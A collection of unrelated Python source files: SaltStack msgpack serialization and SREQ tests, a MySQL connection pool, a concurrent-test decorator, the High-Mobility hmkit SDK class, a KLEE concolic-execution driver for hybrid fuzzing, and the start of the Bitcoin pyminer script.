idata = {'pillar': [OrderedDict(environment='dev')]}
odata = payload.loads(payload.dumps(idata.copy()))
self.assertNoOrderedDict(odata)
self.assertEqual(idata, odata)
def test_datetime_dump_load(self):
'''
Check the custom datetime handler can understand itself
'''
payload = salt.payload.Serial('msgpack')
dtvalue = datetime.datetime(2001, 2, 3, 4, 5, 6, 7)
idata = {dtvalue: dtvalue}
sdata = payload.dumps(idata.copy())
odata = payload.loads(sdata)
self.assertEqual(
sdata,
b'\x81\xc7\x18N20010203T04:05:06.000007\xc7\x18N20010203T04:05:06.000007')
self.assertEqual(idata, odata)
def test_verylong_dump_load(self):
'''
Test verylong encoder/decoder
'''
payload = salt.payload.Serial('msgpack')
idata = {'jid': 20180227140750302662}
sdata = payload.dumps(idata.copy())
odata = payload.loads(sdata)
idata['jid'] = '{0}'.format(idata['jid'])
self.assertEqual(idata, odata)
def test_immutable_dict_dump_load(self):
'''
Test immutable dict encoder/decoder
'''
payload = salt.payload.Serial('msgpack')
idata = {'dict': {'key': 'value'}}
sdata = payload.dumps({'dict': immutabletypes.ImmutableDict(idata['dict'])})
odata = payload.loads(sdata)
self.assertEqual(idata, odata)
def test_immutable_list_dump_load(self):
'''
Test immutable list encoder/decoder
'''
payload = salt.payload.Serial('msgpack')
idata = {'list': [1, 2, 3]}
sdata = payload.dumps({'list': immutabletypes.ImmutableList(idata['list'])})
odata = payload.loads(sdata)
self.assertEqual(idata, odata)
def test_immutable_set_dump_load(self):
'''
Test immutable set encoder/decoder
'''
payload = salt.payload.Serial('msgpack')
idata = {'set': ['red', 'green', 'blue']}
sdata = payload.dumps({'set': immutabletypes.ImmutableSet(idata['set'])})
odata = payload.loads(sdata)
self.assertEqual(idata, odata)
def test_odict_dump_load(self):
'''
Test odict just works. It wasn't until msgpack 0.2.0
'''
payload = salt.payload.Serial('msgpack')
data = OrderedDict()
data['a'] = 'b'
data['y'] = 'z'
data['j'] = 'k'
data['w'] = 'x'
sdata = payload.dumps({'set': data})
odata = payload.loads(sdata)
self.assertEqual({'set': dict(data)}, odata)
def test_mixed_dump_load(self):
'''
Test we can handle all exceptions at once
'''
payload = salt.payload.Serial('msgpack')
dtvalue = datetime.datetime(2001, 2, 3, 4, 5, 6, 7)
od = OrderedDict()
od['a'] = 'b'
od['y'] = 'z'
od['j'] = 'k'
od['w'] = 'x'
idata = {dtvalue: dtvalue, # datetime
'jid': 20180227140750302662, # long int
'dict': immutabletypes.ImmutableDict({'key': 'value'}), # immutable dict
'list': immutabletypes.ImmutableList([1, 2, 3]), # immutable list
'set': immutabletypes.ImmutableSet(('red', 'green', 'blue')), # immutable set
'odict': od, # odict
}
edata = {dtvalue: dtvalue, # datetime, == input
'jid': '20180227140750302662', # string repr of long int
'dict': {'key': 'value'}, # builtin dict
'list': [1, 2, 3], # builtin list
'set': ['red', 'green', 'blue'], # builtin set
'odict': dict(od), # builtin dict
}
sdata = payload.dumps(idata)
odata = payload.loads(sdata)
self.assertEqual(edata, odata)
def test_recursive_dump_load(self):
'''
Test recursive payloads are (mostly) serialized
'''
payload = salt.payload.Serial('msgpack')
data = {'name': 'roscivs'}
data['data'] = data # Data all the things!
sdata = payload.dumps(data)
odata = payload.loads(sdata)
self.assertTrue('recursion' in odata['data'].lower())
class SREQTestCase(TestCase):
port = 8845 # TODO: dynamically assign a port?
@classmethod
def setUpClass(cls):
'''
Class to set up zmq echo socket
'''
def echo_server():
'''
A server that echos the message sent to it over zmq
Optional "sleep" can be sent to delay response
'''
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://*:{0}".format(SREQTestCase.port))
payload = salt.payload.Serial('msgpack')
while SREQTestCase.thread_running.is_set():
try:
# Wait for next request from client
message = socket.recv(zmq.NOBLOCK)
msg_deserialized = payload.loads(message)
log.info('Echo server received message: %s', msg_deserialized)
if isinstance(msg_deserialized['load'], dict) and msg_deserialized['load'].get('sleep'):
log.info('Test echo server sleeping for %s seconds',
msg_deserialized['load']['sleep'])
time.sleep(msg_deserialized['load']['sleep'])
socket.send(message)
except zmq.ZMQError as exc:
if exc.errno == errno.EAGAIN:
continue
raise
SREQTestCase.thread_running = threading.Event()
SREQTestCase.thread_running.set()
SREQTestCase.echo_server = threading.Thread(target=echo_server)
SREQTestCase.echo_server.start()
@classmethod
def tearDownClass(cls):
'''
Remove echo server
'''
# kill the thread
SREQTestCase.thread_running.clear()
SREQTestCase.echo_server.join()
def get_sreq(self):
return salt.payload.SREQ('tcp://127.0.0.1:{0}'.format(SREQTestCase.port))
def test_send_auto(self):
'''
        Test creation, send/recv
'''
sreq = self.get_sreq()
# check default of empty load and enc clear
assert sreq.send_auto({}) == {'enc': 'clear', 'load': {}}
# check that the load always gets passed
assert sreq.send_auto({'load': 'foo'}) == {'load': 'foo', 'enc': 'clear'}
def test_send(self):
sreq = self.get_sreq()
assert sreq.send('clear', 'foo') == {'enc': 'clear', 'load': 'foo'}
@skipIf(True, 'Disabled until we can figure out how to make this more reliable.')
def test_timeout(self):
'''
Test SREQ Timeouts
'''
sreq = self.get_sreq()
# client-side timeout
start = time.time()
# This is a try/except instead of an assertRaises because of a possible
# subtle bug in zmq wherein a timeout=0 actually exceutes a single poll
# before the timeout is reached.
log.info('Sending tries=0, timeout=0')
try:
sreq.send('clear', 'foo', tries=0, timeout=0)
except salt.exceptions.SaltReqTimeoutError:
pass
assert time.time() - start < 1 # ensure we didn't wait
# server-side timeout
log.info('Sending tries=1, timeout=1')
start = time.time()
with self.assertRaises(salt.exceptions.SaltReqTimeoutError):
sreq.send('clear', {'sleep': 2}, tries=1, timeout=1)
assert time.time() - start >= 1 # ensure we actually tried once (1s)
# server-side timeout with retries
log.info('Sending tries=2, timeout=1')
start = time.time()
with self.assertRaises(salt.exceptions.SaltReqTimeoutError):
sreq.send('clear', {'sleep': 2}, tries=2, timeout=1)
assert time.time() - start >= 2 # ensure we actually tried twice (2s)
        # test a regular send afterwards (to make sure sockets aren't in a twist)
log.info('Sending regular send')
assert sreq.send('clear', 'foo') == {'enc': 'clear', 'load': 'foo'}
def test_destroy(self):
'''
Test the __del__ capabilities
'''
sreq = self.get_sreq()
# ensure no exceptions when we go to destroy the sreq, since __del__
# swallows exceptions, we have to call destroy directly
sreq.destroy()
def test_raw_vs_encoding_none(self):
'''
        Test that we handle the raw parameter introduced in msgpack 0.5.2
        correctly based on encoding. When encoding is None, loads should return bytes
'''
payload = salt.payload.Serial('msgpack')
dtvalue = datetime.datetime(2001, 2, 3, 4, 5, 6, 7)
idata = {dtvalue: 'strval'}
sdata = payload.dumps(idata.copy())
odata = payload.loads(sdata, encoding=None)
assert isinstance(odata[dtvalue], six.string_types)
def test_raw_vs_encoding_utf8(self):
'''
        Test that we handle the raw parameter introduced in msgpack 0.5.2
        correctly based on encoding. When encoding is utf-8, loads should return unicode
'''
payload = salt.payload.Serial('msgpack')
dtvalue = datetime.datetime(2001, 2, 3, 4, 5, 6, 7)
idata = {dtvalue: 'strval'}
sdata = payload.dumps(idata.copy())
odata = payload.loads(sdata, encoding='utf-8')
assert isinstance(odata[dtvalue], six.text_type)
|
pool.py
|
# coding: utf-8
import gevent
from gevent import monkey
monkey.patch_all() # support for greenlet
import time
import pymysql
from threading import Lock
import config
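# The `config` module is expected to provide the connection settings read in
# MySQLPool._connect() below. Illustrative sketch of such a module (the values
# are placeholders, only the attribute names come from this file):
#
#   DB_HOST = "127.0.0.1"
#   DB_PORT = 3306
#   DB_USER = "app"
#   DB_PASS = "secret"
#   DB_NAME = "appdb"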
class TooManyConnection(Exception):
""" when too many connection """
class MySQLPool(object):
def __init__(self):
self.pool = []
self.pool_grow_lock = Lock()
self.max_size = 50 # max size of connection pool
def _connect(self):
_config = {
"host": config.DB_HOST,
"port": config.DB_PORT,
"user": config.DB_USER,
"password": config.DB_PASS,
"database": config.DB_NAME,
}
# conn: Representation of a socket with a mysql server.
conn = pymysql.connect(**_config)
return conn
def _get_conn(self):
for conn, lock in self.pool:
if lock.acquire(False):
conn.ping() # will auto reconnect
return conn, lock
# pool need grow
self.pool_grow_lock.acquire()
if len(self.pool) < self.max_size:
conn = self._connect()
lock = Lock()
self.pool.append([conn, lock])
if lock.acquire(False):
self.pool_grow_lock.release()
return conn, lock
self.pool_grow_lock.release()
return None, None
    def run_sql(self, sql, args=None):
        conn = None
        lock = None
        for i in range(3):
            conn, lock = self._get_conn()
            if conn:
                break
            time.sleep(0.5)
        if not conn:
            raise TooManyConnection("too many connections: pool is exhausted, cannot get a connection")
        try:
            cursor = conn.cursor(cursor=pymysql.cursors.DictCursor)
            cursor.execute(sql, args)
            conn.commit()  # always commit here
            data = cursor.fetchall()
            cursor.close()
            return data
        finally:
            lock.release()  # hand the connection back to the pool
_pool = MySQLPool()
run_sql = _pool.run_sql
__all__ = ["run_sql"]
""" test part """
if __name__ == "__main__":
# print run_sql("select * from user;")
import gevent
from gevent import monkey
monkey.patch_all()
jobs = []
for i in range(10):
jobs.append(gevent.spawn(run_sql, "select * from user;"))
gevent.joinall(jobs)
for i in jobs:
        print(i.value)
"""
from threading import Thread
for i in range(100):
t = Thread(target=run_sql, args=("select * from user;", ))
t.start()
"""
|
utils.py
|
def test_concurrently(times):
"""
Add this decorator to small pieces of code that you want to test
concurrently to make sure they don't raise exceptions when run at the
same time. E.g., some Django views that do a SELECT and then a subsequent
INSERT might fail when the INSERT assumes that the data has not changed
since the SELECT.
"""
def test_concurrently_decorator(test_func):
def wrapper(*args, **kwargs):
exceptions = []
import threading
def call_test_func():
try:
test_func(*args, **kwargs)
                except Exception as e:
exceptions.append(e)
raise
threads = []
for i in range(times):
threads.append(threading.Thread(target=call_test_func))
for t in threads:
t.start()
for t in threads:
t.join()
if exceptions:
raise Exception('test_concurrently intercepted %s exceptions: %s' % (len(exceptions), exceptions))
return wrapper
return test_concurrently_decorator
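# Usage sketch (illustrative, not part of the original helper): run a trivial
# throwaway function several times in parallel and check that no exceptions
# are raised; `_smoke_test` is a made-up stand-in for the real code under test.
if __name__ == '__main__':
    @test_concurrently(5)
    def _smoke_test():
        sum(range(1000))  # replace with e.g. a Django view call under test
    _smoke_test()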
|
hmkit.py
|
#!/usr/bin/env python
"""
The MIT License
Copyright (c) 2014- High-Mobility GmbH (https://high-mobility.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import sys
import time
import os
import subprocess
import threading
import codecs
import base64
import logging
import socket
import sys
from datetime import datetime
from . import (
access_certificate,
device_certificate,
storage,
broadcaster,
link,
broadcastlistener,
linklistener,
autoapi,
hm_pyc,
bluetooth
)
from hmkit.autoapi import autoapi_dump
from hmkit.autoapi.identifiers import Identifiers
#-------- Logging Config ------------
logger = logging.getLogger('hmkit')
# define file handler and set formatter
file_handler = logging.FileHandler('hmlog_{:%Y-%m-%d-%H-%M-%S}.log'.format(datetime.now()))
formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(module)s():%(funcName)s:%(lineno)d : %(message)s')
#formatter = logging.Formatter('%(asctime)s : %(levelname)s : %(name)s : %(message)s')
file_handler.setFormatter(formatter)
# add file handler to logger
logger.addHandler(file_handler)
log = logger
class HmKit():
"""
    Main class interface to initialize and access the High-Mobility Python SDK (hmkit)
"""
__instance = None
@staticmethod
def get_instance():
"""
        Get the HmKit instance.
        :rtype: :class:`HmKit`. Returns None if the instance has not been created yet.
"""
return HmKit.__instance
def set_logging_level(self, loglevel=logging.INFO):
"""
        Set the logging level for the hmkit logger.
:param logging loglevel: python logging level for hmkit logs. logging.DEBUG,
logging.INFO, logging.WARNING ,logging.ERROR, logging.CRITICAL
:rtype: None
"""
logger.setLevel(loglevel)
def cmain_thread(self):
"""
        Thread function dedicated to the C-thread operations.
"""
log.debug("PY: cmain_thread")
ret = hm_pyc.cmain_thread()
def hmkit_exit(self):
"""
        Terminate hmkit. This terminates the C threads.
"""
log.info("PY: ****** cthread_exit")
hm_pyc.cthread_exit()
time.sleep(1)
log.info("PY: return** cthread_exit")
def init_threads(self):
"""
        Create a Python thread, which will be delegated to the C thread operations.
"""
##log.debug("Entered init_threads")
thread = threading.Thread(target=self.cmain_thread)
thread.start()
time.sleep(3)
def certificate_update(self, snippet):
"""
        Parses the certificate snippet and updates :class:`device_certificate` and :class:`hm_pyc`
:param bytearray snippet: device certificate snippet
:rtype: None
"""
devCerts_snippet = []
devCerts_decoded = []
devCerts_snippet = snippet
##log.debug("PY: type of dev certs:" + str(type(devCerts_snippet)))
##log.debug("DevCert: " + str(devCerts_snippet[0]))
##log.debug("DevPrv: " + str(devCerts_snippet[1]))
##log.debug("IssPub: " + str(devCerts_snippet[2]))
devCerts_decoded.append(base64.b64decode(devCerts_snippet[0]))
devCerts_decoded.append(base64.b64decode(devCerts_snippet[1]))
devCerts_decoded.append(base64.b64decode(devCerts_snippet[2]))
#------- Dev Cert ------
##log.debug("DevCert decoded, len: " + str(len(devCerts_decoded[0])) + " type: " + str(type(devCerts_decoded[0])) + " Array: " + str(devCerts_decoded[0]))
list_devCerts_decoded = list(devCerts_decoded[0])
bytes_devCerts_decoded = bytes(list_devCerts_decoded)
#log.debug("DevCert decoded List, len: " + str(len(list_devCerts_decoded)) + " type: " + str(type(list_devCerts_decoded)) + " Array: " + str(list_devCerts_decoded))
#log.debug("DevCert decoded Bytes, len: " + str(len(bytes_devCerts_decoded)) + " type: " + str(type(bytes_devCerts_decoded)) + " Array: " + str(bytes_devCerts_decoded))
#-------- Prv -------
#log.debug("Prv decoded, len: " + str(len(devCerts_decoded[1])) + " type: " + str(type(devCerts_decoded[1])) + " Array: " + str(devCerts_decoded[1]))
list_prv_decoded = list(devCerts_decoded[1])
bytes_prv_decoded = bytes(list_prv_decoded)
#log.debug("DevCert decoded List, len: " + str(len(list_prv_decoded)) + " type: " + str(type(list_prv_decoded)) + " Array: " + str(list_prv_decoded))
#log.debug("Prv decoded Bytes, len: " + str(len(bytes_prv_decoded)) + " type: " + str(type(bytes_prv_decoded)) + " Array: " + str(bytes_prv_decoded))
#---------- Pub -------
#log.debug("Prv decoded, len: " + str(len(devCerts_decoded[2])) + " type: " + str(type(devCerts_decoded[2])) + " Array: " + str(devCerts_decoded[2]))
list_pub_decoded = list(devCerts_decoded[2])
bytes_pub_decoded = bytes(list_pub_decoded)
#log.debug("Pub decoded List, len: " + str(len(list_pub_decoded)) + " type: " + str(type(list_pub_decoded)) + " Array: " + str(list_pub_decoded))
#log.debug("Pub decoded Bytes, len: " + str(len(bytes_pub_decoded)) + " type: " + str(type(bytes_pub_decoded)) + " Array: " + str(bytes_pub_decoded))
#print("DevPrv decoded, len: ",len(devCerts_decoded[1]) ," Array: ", devCerts_decoded[1])
h_string2 = codecs.encode(devCerts_decoded[1], 'hex')
#print("Hex, len: ", len(h_string2), " Value: ", h_string2)
#print("IssPub decoded, len: ",len(devCerts_decoded[2]) ," Array: ", devCerts_decoded[2])
h_string3 = codecs.encode(devCerts_decoded[2], 'hex')
#print("Hex, len: ", len(h_string3), " Value: ", h_string3)
self.device_certificate.update_devcertf(bytes_devCerts_decoded)
ret = hm_pyc.set_certs(bytes_devCerts_decoded, bytes_prv_decoded, bytes_pub_decoded)
def download_access_certificate(self, token):
"""
        Pass the access token to :class:`access_certificate` to download the Access Certificate
:param bytearray token: Access Token for device
:rtype: None
"""
self.access_certificate.download_access_certificate(token)
self.storage.store_access_certificate(self.access_certificate.get_raw_certiticate(), self.access_certificate.get_gaining_serial_number())
######## for Testing
ac = self.storage.get_access_certificate(self.access_certificate.get_gaining_serial_number())
#print("Received AC from Storage: " + str(ac))
#ret = self.storage.delete_access_certificate(self.access_certificate.get_gaining_serial_number())
#print("Deleted AC from Storage: ")
########
def get_certificate(self, serial):
"""
returns the Access Certificate
:param bytearray serial: Serial Number
:returns: AccessCertificate() object that contains the received Access certificate
:rtype: access_certificate.AccessCertificate()
"""
#print("HMKT: " + "get_certificate()")
# TODO: get it from storage based on the serial number
return self.access_certificate
#-------------------------------------------------
#--------------------- Init ----------------------
#-------------------------------------------------
def __init__(self, snippet, loglevel=logging.INFO):
"""
        Main :class:`HmKit` __init__ to initialize and access the High-Mobility Python SDK (hmkit)
:param bytearray snippet: Device certificate snippet downloaded from developer centre
:param logging loglevel: python logging level for hmkit logs. logging.DEBUG, logging.INFO, logging.WARNING ,logging.ERROR, logging.CRITICAL
:rtype: None
"""
global listener
##print("PY: Init Function of HmKit")
logger.setLevel(loglevel)
# Virtually private constructor
if HmKit.__instance != None:
raise Exception("This class is a singleton!")
else:
HmKit.__instance = self
# access certificate and device certificate class objects
self.access_certificate = access_certificate.AccessCertificate(self)
self.device_certificate = device_certificate.DeviceCertificate(self)
self.storage = storage.Storage(self)
# update the received certificate snippet
self.certificate_update(snippet)
        # Initialize Python threads
self.init_threads()
# set python c interface module
self.hm_pyc = hm_pyc
# set bluetooth interface module
self.bluetooth = bluetooth.Bluetooth(self.hm_pyc)
# set autoapidump module
self.autoapi_dump = autoapi_dump()
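# Usage sketch (illustrative; DEV_CERT_SNIPPET and ACCESS_TOKEN are
# placeholders that must be obtained from the High-Mobility developer centre):
#
#   kit = HmKit(DEV_CERT_SNIPPET, loglevel=logging.DEBUG)
#   kit.download_access_certificate(ACCESS_TOKEN)
#   cert = kit.get_certificate(serial=None)  # serial-based lookup is a TODO above
#   kit.hmkit_exit()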
|
klee_conc_explorer.py
|
import ConfigParser
import multiprocessing
import subprocess32 as subprocess
import os
import sys
import utils
import signal
from utils import bcolors
def se_info(s):
print bcolors.HEADER+"[KleeConc-Info]"+bcolors.ENDC," {0}".format(s)
class ConcExplorer:
def __init__(self, config, target):
self.jobs = {}
self.started_jobs = set()
self.config = config
self.target = target
self.get_config()
utils.mkdir_force(self.seed_dir)
self.pid_ctr = 0
se_info("Concolic Explorer using searcher[{0}]".format(''.join(self.get_search_heuristics())))
def get_config(self):
config = ConfigParser.ConfigParser()
config.read(self.config)
self.bin = config.get("klee conc_explorer", "bin")
self.converter = config.get("klee conc_explorer","converter")
self.seed_dir = config.get("klee conc_explorer", "klee_seed_dir").replace("@target", self.target)
self.search_heuristics = config.get("klee conc_explorer", "search_heuristic").split(":")
self.target_bc = config.get("klee conc_explorer", "target_bc").replace("@target", self.target).split()[0]
self.options = config.get("klee conc_explorer", "target_bc").replace("@target", self.target).split()[1:]
self.klee_err_dir = config.get("klee conc_explorer", "error_dir").replace("@target", self.target)
try:
self.free_mode = True if config.get("klee conc_explorer", "free_mode") == "True" else False
except Exception:
print "Using default free mode value"
self.free_mode = False
try:
self.optimistic_solving = True if config.get("klee conc_explorer", "optimistic") == "True" else False
except Exception:
print "Using default optimisitc mode"
self.optimistic_solving = False
try:
self.max_time_per_seed = config.get("klee conc_explorer", "max_time_per_seed")
except Exception:
# by default no time limit per seed.
self.max_time_per_seed = 0
try:
self.max_output = config.get("klee conc_explorer", "max_interesting_output")
except Exception:
self.max_output = None
try:
self.savior_use_ubsan = True if config.get("klee conc_explorer", "savior_use_ubsan") == "True" else False
except Exception:
self.savior_use_ubsan = False
try:
self.max_mem = config.get("klee conc_explorer", "max_memory")
except Exception:
self.max_mem = str(1024*1024*20) # in kbytes
try:
self.max_loop_bounds = config.get("klee conc_explorer", "max_loop_bounds")
except Exception:
self.max_loop_bounds = None
self.bitmodel = config.get("moriarty", "bitmodel")
self.input_type = 'symfile' if '@@' in self.options else 'stdin'
self.sync_dir_base = config.get("moriarty", "sync_dir").replace("@target", self.target)
if "AFLUnCovSearcher" in self.get_search_heuristics():
self.fuzzer_cov_file = config.get("auxiliary info", "cov_edge_file").replace("@target", self.target)
        # only_replay_seed is optional and only used in concolic mode
try:
self.only_replay_seed = True if config.get("klee conc_explorer", "only_replay_seed") == '1' else False
except Exception:
self.only_replay_seed= False
        # handle C++-related options
try:
self.klee_ctor_stub = True if config.get("klee conc_explorer", "klee_ctor_stub") == '1' else False
except Exception:
self.klee_ctor_stub = False
try:
self.klee_uclibcxx = True if config.get("klee conc_explorer", "klee_uclibcxx") == '1' else False
except Exception:
self.klee_uclibcxx = False
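    # Illustrative config sketch for the options parsed above. Only the section
    # and key names come from this parser; the paths and values are placeholders:
    #
    #   [klee conc_explorer]
    #   bin = /opt/klee/bin/klee
    #   converter = /opt/savior/afl-ktest-converter
    #   klee_seed_dir = /out/@target/klee_seeds
    #   search_heuristic = AFLUnCovSearcher:SANGuidedSearcher
    #   target_bc = /out/@target/target.bc @@
    #   error_dir = /out/@target/klee_errors
    #
    #   [moriarty]
    #   bitmodel = 32
    #   sync_dir = /out/@target/sync
    #
    #   [auxiliary info]
    #   cov_edge_file = /out/@target/afl_covered_edges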
def __repr__(self):
return "SE Engine: KLEE Concolic Explorer"
def get_search_heuristics(self):
"""return a list of search heuristics"""
return self.search_heuristics
def exceed_mem_limit(self):
pass
def alive(self):
alive = False
multiprocessing.active_children()
for pid in [self.jobs[x]['real_pid'] for x in self.jobs]:
try:
os.kill(pid, 0)
print "conc_explorer pid: {0} is alive".format(pid)
alive = True
except Exception:
print "conc_explorer pid: {0} not alive".format(pid)
return alive
def run(self, input_id_map_list, cov_file):
"""
-create seed-out-dir
For each input,
-convert ktest move to seed-out-dir
-create sync dir
-build cmd
-create new process job
"""
pid = self.get_new_pid()
klee_seed_dir = self.seed_dir + "/klee_instance_conc_"+str(pid)
utils.mkdir_force(klee_seed_dir)
input_counter = 0
max_input_size = 0
se_info("{0} activated. input list : {1}".format(self, [x['input'] for x in input_id_map_list]))
se_info("{0} activated. input score : {1}".format(self, [x['score'] for x in input_id_map_list]))
try:
se_info("{0} activated. input size: {1}".format(self, [x['size'] for x in input_id_map_list]))
except Exception:
pass
for input_id_map in input_id_map_list:
#--generate klee seed ktest
# print input_id_map
afl_input = input_id_map['input']
if max_input_size < os.path.getsize(afl_input):
max_input_size = os.path.getsize(afl_input)
klee_seed = klee_seed_dir+"/"+str(input_counter).zfill(6)+".ktest"
# print "before calling converter"
self.call_converter("a2k", afl_input, klee_seed, self.bitmodel, self.input_type)
input_counter += 1
if not os.path.exists(klee_seed):
print "no seed" + klee_seed
continue
#--create sync_dir for new klee instance
key = "klee_instance_conc_" + str(pid).zfill(6)
new_sync_dir = self.sync_dir_base+"/"+key+"/queue"
utils.mkdir_force(new_sync_dir)
#--build klee instance cmd
edge_ids = [x for x in input_id_map['interesting_edges']]
klee_cmd = self.build_cmd(klee_seed_dir, edge_ids, new_sync_dir, max_input_size, afl_input, cov_file)
print ' '.join(klee_cmd)
#--construct process meta data, add to jobs list
kw = {'mock_eof':True, 'mem_cap': self.max_mem, 'use_shell':True}
p = multiprocessing.Process(target=utils.exec_async, args=[klee_cmd], kwargs=kw)
p.daemon = True
task_st = {}
task_st['instance'] = p
task_st['sync_dir'] = new_sync_dir
task_st['seed'] = klee_seed
task_st['cmd'] = klee_cmd
if "AFLUnCovSearcher" in self.get_search_heuristics():
task_st['afl_cov'] = self.fuzzer_cov_file
self.jobs[pid] = task_st
for pid, task in self.jobs.iteritems():
try:
if pid not in self.started_jobs:
task['instance'].start()
task['real_pid'] = task['instance'].pid
# print "starting klee process: ", task['real_pid']
self.started_jobs.add(pid)
else:
se_info("WTF the process {0} is already started".format(pid))
except Exception:
pass
return (key, [x['input'] for x in input_id_map_list])
def stop(self):
"""
Terminate all jobs,
you could have more fine-grained control by extending this function
"""
se_info("{0} deactivated".format(self))
for pid, task in self.jobs.iteritems():
se_info("Terminting klee instance: {0} {1} real pid:{2}".format(pid, task['instance'], task['real_pid']))
utils.terminate_proc_tree(task['real_pid'])
#reset jobs queue
self.jobs = {}
# self.started_jobs= set()
def build_cmd(self, ktest_seed_dir, edge_ids, sync_dir, max_len, afl_input, out_cov_file):
"""
each afl_testcase will have a list of branch ids,
we use these info to construct the command for
starting a new klee instance
by default:
use klee's own searching algo
if specified afl_uncov in config, use AFLUnCovSearcher
"""
cmd = []
afl_uncov = "--afl-covered-branchid-file="
klee_out_uncov = "--klee-covered-branchid-outfile="
sync_dir_flag = "--sync-dir="
stdin_sym_flag = "--sym-stdin"
file_sym_flag = "--sym-files"
max_time_per_seed_flag = "--max-time-per-seed="
sanitizer_searcher_flag = "--edge-sanitizer-heuristic"
remove_uninterested_edge_flag = "-remove-unprioritized-states"
if self.klee_uclibcxx == True:
klee_libc = "--libc=uclibcxx"
else:
klee_libc = "--libc=uclibc"
if self.klee_ctor_stub == True:
klee_ctor_stub="--disable-inject-ctor-and-dtor=false"
else:
klee_ctor_stub="--disable-inject-ctor-and-dtor=true"
# max_solve_time = "-max-solver-time=100"
common_prefix = [self.bin,
klee_libc,
klee_ctor_stub,
"--posix-runtime",
"--concolic-explorer=true",
"--named-seed-matching=true",
"--allow-external-sym-calls",
"--use-non-intrinsics-memops=false",
"--check-overshift=false",
"--solver-backend=z3",
"--max-solver-time=5",
"--disable-bound-check=true",
"--disable-ubsan-check=true",
remove_uninterested_edge_flag,
]
if self.free_mode == True:
common_prefix.append("--free-mode=true")
else:
common_prefix.append("--free-mode=false")
common_prefix.append("--fixup-afl-ids=true")
if self.optimistic_solving == True:
common_prefix.append("--relax-constraint-solving=true")
else:
common_prefix.append("--relax-constraint-solving=false")
if self.savior_use_ubsan == True:
common_prefix.append("--savior-ubsan=true")
else:
common_prefix.append("--savior-ubsan=false")
common_prefix.append("--max-memory=0")
common_prefix.append(max_time_per_seed_flag+self.max_time_per_seed)
if self.max_loop_bounds != None:
common_prefix.append("--max-loop-bounds="+self.max_loop_bounds)
if "AFLUnCovSearcher" in self.get_search_heuristics():
common_prefix.append(afl_uncov + self.fuzzer_cov_file)
common_prefix.append(klee_out_uncov + out_cov_file)
if "SANGuidedSearcher" in self.get_search_heuristics():
common_prefix.append(sanitizer_searcher_flag)
        cmd.extend(common_prefix)
cmd.append("--seed-out-dir=" + ktest_seed_dir)
cmd.append(sync_dir_flag + sync_dir)
cmd.append(self.target_bc)
new_options = list(self.options)
for _ in xrange(len(new_options)):
if new_options[_] == "@@":
new_options[_] = "A"
cmd.extend(new_options)
if self.input_type == "stdin":
cmd.append(stdin_sym_flag)
cmd.append(str(max_len))
else:
if not "@@" in self.options:
cmd.append("A")
cmd.append(file_sym_flag)
cmd.append("1")
cmd.append(str(max_len))
return cmd
def get_new_pid(self):
self.pid_ctr += 1
return self.pid_ctr
def call_converter(self, mode, afl_input, ktest, bitmodel, inputtype):
"""
SEs directly invoke the converter to
convert between the afl/klee file formats
        as the SE input format is specific to the target SE engine
"""
        args = []
args.append(self.converter)
args.append("--mode="+ mode)
args.append("--afl-name="+afl_input)
args.append("--ktest-name="+ktest)
args.append("--bitmodel="+bitmodel);
args.append("--inputmode="+inputtype);
subprocess.Popen(args).wait()
def terminate_callback(self):
"""called when SIGINT and SIGTERM"""
se_info("packing klee error cases into [{0}]".format(self.klee_err_dir))
utils.pack_klee_errors(self.target, self.klee_err_dir)
def periodic_callback(self):
"""called every 1 hour"""
se_info("packing klee error cases into [{0}]".format(self.klee_err_dir))
utils.pack_klee_errors(self.target, self.klee_err_dir)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
